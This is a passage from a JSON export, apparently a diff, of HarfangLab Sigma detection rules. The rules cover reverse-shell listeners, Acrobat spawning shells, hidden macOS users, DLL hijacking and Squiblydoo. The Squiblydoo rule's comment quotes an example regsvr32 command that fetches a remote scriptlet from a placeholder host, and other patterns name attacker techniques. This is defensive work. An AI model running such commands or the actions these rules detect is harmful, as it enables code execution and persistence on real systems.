network_listen\n product: linux\ndetection:\n\n selection:\n ProcessImage|startswith:\n - '/tmp/'\n - '/var/'\n - '/run/'\n - '/root/'\n - '/dev/shm/'\n - '/boot/'\n\n filter_var:\n ProcessImage|startswith:\n - '/var/lib/'\n - '/var/opt/'\n\n # Ports opened on localhost aren't considered suspicious\n filter_localhost:\n Address:\n - '127.0.0.1'\n - '::1'\n\n exclusion_java:\n # Java is embedded in so much application it becomes quickly unfeasable to list all of them\n ProcessImage|endswith: '/java'\n\n exclusion_hoptimal:\n ProcessImage: '/tmp/InstalleurVIDALHoptimalAndApi_unix_*/jre/bin/java'\n\n exclusion_go:\n # /tmp/go-build1480910053/b001/logsevents.test\n # /tmp/go-build3216331136/b001/schedulerd.test\n Image|startswith: '/tmp/go-build*/????/'\n\n exclusion_plz_sandbox:\n ProcessImage|startswith: '/tmp/plz_sandbox/'\n\n exclusion_opcon:\n ProcessImage|startswith: '/tmp/opcon_agent/bin/'\n\n exclusion_jetbrains:\n ProcessImage: '/tmp/.mount_*/jetbrains-toolbox'\n\n exclusion_veeam:\n ProcessImage:\n - '/tmp/VeeamAgent*/veeamagent'\n - '/var/tmp/veeamagent*/veeamagent'\n\n exclusion_collabora_appimage:\n ProcessImage: '/tmp/appimage_extracted_*/usr/bin/coolwsd'\n\n exclusion_veeam_plugin_manager:\n ProcessParentImage: '/opt/veeam/VeeamPluginforOracleRMAN/RMANPluginManager'\n\n exclusion_ossec_ids:\n - ProcessImage:\n - '/var/ossec/bin/wazuh-remoted'\n - '/var/ossec/bin/wazuh-authd'\n - ProcessCommandLine: '/var/ossec/framework/python/bin/python3 /var/ossec/api/scripts/wazuh_apid.py'\n\n exclusion_nexcloud:\n ProcessImage: '/var/www/html/nextcloud/*/apps/notify_push/bin/x86_64/notify_push'\n\n exclusion_oracle:\n ProcessImage: '/tmp/CVU_*_resource/exectask'\n\n exclusion_vscode:\n ProcessImage: '/root/.vscode-server/bin/*/node'\n\n exclusion_k3s:\n ProcessImage|endswith: '/k3s/data/*/bin/k3s'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n", + "block_on_agent": false, + "quarantine_on_agent": false, + 
"rule_level_override": null, + "rule_id": "08f3ae91-3811-4a4b-8f04-87302ca365c9", + "rule_name": "Process Started Listening for Incoming Connections from Suspicious Path", + "rule_description": "Detects a process that starts listening for incoming connections from a suspicious path.\nAttackers may setup reverse shells listening for incoming connections as a persistence and C2 mechanism.\nIt is recommended to ensure the process had legitimate reason to do so and that the host wasn't compromised.\n", + "rule_creation_date": "2023-12-15", + "rule_modified_date": "2026-02-27", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control", + "attack.defense_evasion", + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1104", + "attack.t1205.001", + "attack.t1571" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "08f5486f-0238-406f-a789-aad56def2bd3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.626532Z", + "creation_date": "2026-03-23T11:45:34.626534Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.626538Z", + "rule_level": "high", + "rule_confidence": 
"strong", + "rule_confidence_override": null, + "references": [ + "https://hacksys.io/blogs/adobe-reader-resetform-cagg-rce-cve-2023-21608", + "https://attack.mitre.org/techniques/T1566/", + "https://attack.mitre.org/techniques/T1203/", + "https://attack.mitre.org/techniques/T1204/002/" + ], + "name": "t1104_acrobat_spawning_malicious_process.yml", + "content": "title: Suspicious Process Started by Acrobat Reader\nid: 08f5486f-0238-406f-a789-aad56def2bd3\ndescription: |\n Detects the suspicious execution of binaries by Adobe Acrobat Reader.\n Adversaries can use phishing techniques to send malicious PDF files that exploit vulnerabilities in Adobe Acrobat Reader, or contain malicious script as an initial access vector.\n For example, the CVE-2023-21608 is known to make Adobe Acrobat execute arbitrary code when a user opens a malicious PDF file.\n It is recommended to check the origin of the PDF file and the legitimacy of the executed binary.\nreferences:\n - https://hacksys.io/blogs/adobe-reader-resetform-cagg-rce-cve-2023-21608\n - https://attack.mitre.org/techniques/T1566/\n - https://attack.mitre.org/techniques/T1203/\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2023/01/31\nmodified: 2026/01/12\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566\n - attack.execution\n - attack.t1203\n - attack.t1204.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_acrobat:\n ParentImage|endswith:\n - '\\Acrobat.exe'\n - '\\AcroRd32.exe'\n - '\\Acrobat_sl.exe'\n - '\\AcroCEF.exe'\n\n selection_bin:\n OriginalFileName:\n - 'Cmd.Exe'\n - 'PowerShell.EXE'\n - 'cscript.exe'\n - 'wscript.exe'\n - 'schtasks.exe'\n - 'REGSVR32.EXE'\n - 'wmic.exe' # use wmic to spawn PowerShell or else under wmiprvse or squiblytwo\n - 
'MSHTA.EXE'\n - 'RUNDLL32.EXE'\n - 'msiexec.exe'\n - 'MSBuild.exe' # https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml\n - 'appvlp.exe' # lolbas : https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/\n - 'extrac32.exe' # https://twitter.com/ShadowChasing1/status/1557287930267578368\n - 'calc.exe' # For POCs\n\n exclusion_msiexec_adobe:\n CommandLine|contains:\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1036-1033-7760-BC15014EA700} CLEANUP_CEFFOLDER=1 DISABLE_FIU_CHECK=1 /qn\n # C:\\WINDOWS\\system32\\msiexec.exe /I {AC76BA86-1036-1033-7760-BC15014EA700} REINSTALL=ALL REINSTALLMODE=omus /qb\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1036-1033-7760-BC15014EA700} REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1033-FFFF-7760-BC15014EA700} REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1033-FF00-7760-BC15014EA700} REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1033-FFFF-7760-BC15014EA700} REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-7AD7-1036-7B44-AC0F074E4100} CLEANUP_CEFFOLDER=1 DISABLE_FIU_CHECK=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1033-FFFF-7760-0C0F074E4100} CLEANUP_CEFFOLDER=1 DISABLE_FIU_CHECK=1 /qn\n # msiexec.exe /I {AC76BA86-1033-F400-BA7E-000000000004} ADDLOCAL=ChineseSLanguageSupport /qb\n # C:\\WINDOWS\\system32\\msiexec.exe /I {AC76BA86-1033-FFFF-7760-000000000006} REINSTALL=ALL REINSTALLMODE=omus /qb\n - 'msiexec.exe /i {AC76BA86-????-????-????-????????????} '\n - 'msiexec.exe /i {AC76BA86-????-????-????-????????????} ' # The two spaces are intentional\n - 
'msiexec.exe /fmous {AC76BA86-????-????-????-????????????} '\n OriginalFileName: 'msiexec.exe'\n\n exclusion_spool:\n CommandLine|startswith:\n # rundll32 C:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\hpmsn140.DLL,MonitorPrintJobStatus *\n # rundll32 C:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\hpmsn175.dll,MonitorPrintJobStatus *\n - 'rundll32 ?:\\WINDOWS\\system32\\spool\\DRIVERS\\'\n - 'rundll32.exe ?:\\WINDOWS\\system32\\spool\\DRIVERS\\'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\spool\\DRIVERS\\'\n # regsvr32 /s /n /i C:\\Windows\\system32\\spool\\DRIVERS\\W32X86\\3\\UDCOfficeAddin2000.dll\n - 'regsvr32 /s /n /i ?:\\Windows\\system32\\spool\\DRIVERS\\'\n - 'regsvr32 /s /n /i:OnPrinterAccess ?:\\WINDOWS\\system32\\spool\\DRIVERS\\'\n\n exclusion_rundll32:\n CommandLine|startswith:\n - '?:\\WINDOWS\\system32\\rundll32.exe ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile'\n - '?:\\WINDOWS\\SysWOW64\\rundll32.exe ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\cryptext.dll,CryptExtAddCERMachineOnlyAndHwnd MIIGq'\n - '?:\\WINDOWS\\System32\\RunDll32.exe ?:\\WINDOWS\\system32\\hotplug.dll,HotPlugSafeRemovalDriveNotification '\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\eed_ec.dll,SpeedLauncher'\n - '?:\\WINDOWS\\System32\\rundll32.exe ?:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll, ImageView_Fullscreen '\n - '?:\\Windows\\System32\\rundll32.exe ?:\\WINDOWS\\System32\\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding'\n - '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\WINDOWS\\System32\\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding'\n - '?:\\Windows\\System32\\rundll32.exe shwebsvc.dll,AddNetPlaceRunDll'\n\n exclusion_mailprotocolhandler:\n CommandLine|contains: 'rundll32.exe *,MailToProtocolHandler mailto:'\n\n exclusion_open_adobe_website:\n CommandLine|contains:\n - 'start 
microsoft-edge:http://www.adobe.com/'\n - 'start microsoft-edge:http://acrobat.adobe.com/'\n - 'start microsoft-edge:https://www.adobe.com/'\n - 'start microsoft-edge:https://acrobat.adobe.com/'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "08f5486f-0238-406f-a789-aad56def2bd3", + "rule_name": "Suspicious Process Started by Acrobat Reader", + "rule_description": "Detects the suspicious execution of binaries by Adobe Acrobat Reader.\nAdversaries can use phishing techniques to send malicious PDF files that exploit vulnerabilities in Adobe Acrobat Reader, or contain malicious script as an initial access vector.\nFor example, the CVE-2023-21608 is known to make Adobe Acrobat execute arbitrary code when a user opens a malicious PDF file.\nIt is recommended to check the origin of the PDF file and the legitimacy of the executed binary.\n", + "rule_creation_date": "2023-01-31", + "rule_modified_date": "2026-01-12", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution", + "attack.initial_access" + ], + "rule_technique_tags": [ + "attack.t1203", + "attack.t1204.002", + "attack.t1566" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0915b4a3-17da-4c9c-bf08-1db96769b345", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + 
"name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.625928Z", + "creation_date": "2026-03-23T11:45:34.625930Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.625934Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md", + "https://attack.mitre.org/techniques/T1564/002/" + ], + "name": "t1564_002_create_hidden_user_macos.yml", + "content": "title: Hidden User Created\nid: 0915b4a3-17da-4c9c-bf08-1db96769b345\ndescription: |\n Detects a suspicious attempt at creating a hidden user.\n Adversaries may use hidden users to hide the presence of user accounts they create or modify.\n It is recommended to check it the created account is expected to be created.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md\n - https://attack.mitre.org/techniques/T1564/002/\ndate: 2022/08/25\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Dscl\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.AccountManipulation\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_base_dscl:\n Image: '/usr/bin/dscl'\n User: 'root'\n CommandLine|contains:\n - ' create'\n - ' -create'\n ParentImage|contains: '?'\n\n selection_specific_dscl_low_id_hidden1:\n # ID < 500 are considered hidden by default on *OS\n #CommandLine|re:\n # - '.*UniqueID *[0-4]?[0-9]?[0-9]( |$).*'\n CommandLine|contains:\n - 'UniqueID ? '\n - 'UniqueID ?? '\n - 'UniqueID 1?? '\n - 'UniqueID 2?? 
'\n - 'UniqueID 3?? '\n - 'UniqueID 4?? '\n\n selection_specific_dscl_low_id_hidden2:\n # ID < 500 are considered hidden by default on *OS\n CommandLine|endswith:\n - 'UniqueID ?'\n - 'UniqueID ??'\n - 'UniqueID 1??'\n - 'UniqueID 2??'\n - 'UniqueID 3??'\n - 'UniqueID 4??'\n\n selection_specific_dscl_hidden_parameter:\n #CommandLine|re: '.*IsHidden *1.*'\n CommandLine|contains:\n - 'IsHidden *1'\n - 'IsHidden *true'\n\n selection_base_sysadminctl:\n Image: '/usr/sbin/sysadminctl'\n User: 'root'\n CommandLine|contains: ' -addUser'\n ParentImage|contains: '?'\n\n selection_specific_sysadminctl_low_id_hidden1:\n # ID < 500 are considered hidden by default on *OS\n #CommandLine|re:\n # - '.*-UID *[0-4]?[0-9]?[0-9]( |$).*'\n CommandLine|contains:\n - '-UID ? '\n - '-UID ?? '\n - '-UID 1?? '\n - '-UID 2?? '\n - '-UID 3?? '\n - '-UID 4?? '\n\n selection_specific_sysadminctl_low_id_hidden2:\n # ID < 500 are considered hidden by default on *OS\n CommandLine|endswith:\n - '-UID ?'\n - '-UID ??'\n - '-UID 1??'\n - '-UID 2??'\n - '-UID 3??'\n - '-UID 4??'\n\n exclusion_jamf:\n # /usr/bin/dscl localhost -create /Local/Default/Users/mngt-admin IsHidden 1\n # parent:\n # /usr/local/jamf/bin/jamf postMdmEnrollment -server_url https://xxxx.jamfcloud.com -invitation yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy\n # jamf enroll -invitation yyyyyyyyyyyyyyyyyyyyyyyyyyy -noPolicy\n - ProcessParentImage: '/usr/local/jamf/bin/jamf'\n - ProcessAncestors|contains: '|/usr/local/jamf/bin/jamf'\n\n exclusion_known_users:\n ProcessCommandLine|contains:\n - '/usr/bin/dscl . -create users/_fsvpn_' # fsecure\n - 'create /users/_nixbld' # nix\n - 'dscl . 
create /users/eset-ecsm-' # eset\n\n exclusion_windscribe:\n ProcessParentImage: '/Library/PrivilegedHelperTools/com.windscribe.helper.macos'\n\n exclusion_installer:\n - ProcessParentCommandLine|startswith: '/bin/bash /tmp/PKInstallSandbox.??????/Scripts/'\n - ProcessGrandparentCommandLine|startswith: '/bin/bash /tmp/PKInstallSandbox.??????/Scripts/'\n\n exclusion_intune:\n ProcessGrandparentImage: '/Library/Intune/Microsoft Intune Agent.app/Contents/MacOS/IntuneMdmDaemon'\n\n condition: ((selection_base_dscl and 1 of selection_specific_dscl_*) or (selection_base_sysadminctl and 1 of selection_specific_sysadminctl_*)) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0915b4a3-17da-4c9c-bf08-1db96769b345", + "rule_name": "Hidden User Created", + "rule_description": "Detects a suspicious attempt at creating a hidden user.\nAdversaries may use hidden users to hide the presence of user accounts they create or modify.\nIt is recommended to check it the created account is expected to be created.\n", + "rule_creation_date": "2022-08-25", + "rule_modified_date": "2025-12-29", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1564.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "096b4462-7384-4447-95a6-a2c2c26ffcb0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + 
"backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.096369Z", + "creation_date": "2026-03-23T11:45:34.096371Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.096375Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia", + "https://securelist.com/common-ttps-of-attacks-against-industrial-organizations/110319/", + "https://twitter.com/malwrhunterteam/status/1558149472672251904", + "https://unit42.paloaltonetworks.com/dll-hijacking-techniques/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_mcods.yml", + "content": "title: DLL Hijacking via McOds.exe\nid: 096b4462-7384-4447-95a6-a2c2c26ffcb0\ndescription: |\n Detects potential Windows DLL Hijacking via McOds.exe related to McAfee VirusScan.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia\n - https://securelist.com/common-ttps-of-attacks-against-industrial-organizations/110319/\n - https://twitter.com/malwrhunterteam/status/1558149472672251904\n - 
https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/20\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'McOds.exe'\n ImageLoaded|endswith: '\\McVsoCfg.dll'\n\n filter_legitimate_image:\n Image|startswith: '?:\\Program Files\\McAfee\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith: '?:\\Program Files\\McAfee\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'McAfee, Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "096b4462-7384-4447-95a6-a2c2c26ffcb0", + "rule_name": "DLL Hijacking via McOds.exe", + "rule_description": "Detects potential Windows DLL Hijacking via McOds.exe related to McAfee VirusScan.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2024-03-20", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + 
"source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "09718066-8257-4dd4-83e0-14787bbc9fd3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.615428Z", + "creation_date": "2026-03-23T11:45:34.615432Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.615439Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://car.mitre.org/analytics/CAR-2019-04-003/", + "https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo", + "https://github.com/cobbr/Covenant", + "https://attack.mitre.org/techniques/T1218/010/", + "https://lolbas-project.github.io/lolbas/Libraries/Scrobj/", + "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/" + ], + "name": "t1218_010_squiblydoo.yml", + "content": "title: Possible Squiblydoo Attack Detected\nid: 09718066-8257-4dd4-83e0-14787bbc9fd3\ndescription: |\n Detects a suspicious invocation of `scrobj.dll` by `regsvr32.exe` (both lolbins), a technique also known as Squiblydoo.\n Attackers can used this technique to proxy execution of malicious code.\n This can be a sign of Covenant Regsvr32 launcher exploitation.\n Covenant is a .NET command and control 
framework that aims to highlight the attack surface of .NET.\n It is recommended to investigate the parent process for suspicious activities as well as other malicious actions stemming from the regsvr32 process.\nreferences:\n - https://car.mitre.org/analytics/CAR-2019-04-003/\n - https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo\n - https://github.com/cobbr/Covenant\n - https://attack.mitre.org/techniques/T1218/010/\n - https://lolbas-project.github.io/lolbas/Libraries/Scrobj/\n - https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/\ndate: 2021/02/10\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.010\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Scrobj\n - classification.Windows.LOLBin.Regsvr32\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # regsvr32 /s /u /n /i:http://xxx.xxx.xxxx.xxx:9998/19jSi scrobj\n selection_1:\n - Image|endswith: '\\regsvr32.exe'\n - OriginalFileName: 'REGSVR32.EXE'\n selection_2:\n CommandLine|contains: 'scrobj'\n\n exclusion_scrobj:\n CommandLine:\n - '?:\\windows\\system32\\regsvr32.exe ?:\\windows\\system32\\scrobj.dll /s'\n - '?:\\WINDOWS\\SysWoW64\\regsvr32.exe ?:\\WINDOWS\\SysWoW64\\scrobj.dll /s'\n - 'regsvr32.exe /s ?:\\Windows??system32\\scrobj.dll'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "09718066-8257-4dd4-83e0-14787bbc9fd3", + "rule_name": "Possible Squiblydoo Attack Detected", + "rule_description": "Detects a suspicious invocation of `scrobj.dll` by `regsvr32.exe` (both lolbins), a technique also known as Squiblydoo.\nAttackers can used this technique to proxy execution of malicious code.\nThis can be a sign of 
Covenant Regsvr32 launcher exploitation.\nCovenant is a .NET command and control framework that aims to highlight the attack surface of .NET.\nIt is recommended to investigate the parent process for suspicious activities as well as other malicious actions stemming from the regsvr32 process.\n", + "rule_creation_date": "2021-02-10", + "rule_modified_date": "2025-04-14", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1218.010" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "098502c3-27e1-4c6f-a53e-8fa8f3dd549f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.594813Z", + "creation_date": "2026-03-23T11:45:34.594816Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.594824Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": 
"t1574_001_dll_hijacking_pcalua.yml", + "content": "title: DLL Hijacking via pcalua.exe\nid: 098502c3-27e1-4c6f-a53e-8fa8f3dd549f\ndescription: |\n Detects potential Windows DLL Hijacking via pcalua.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'pcalua.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\pcaui.dll'\n - '\\wer.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": 
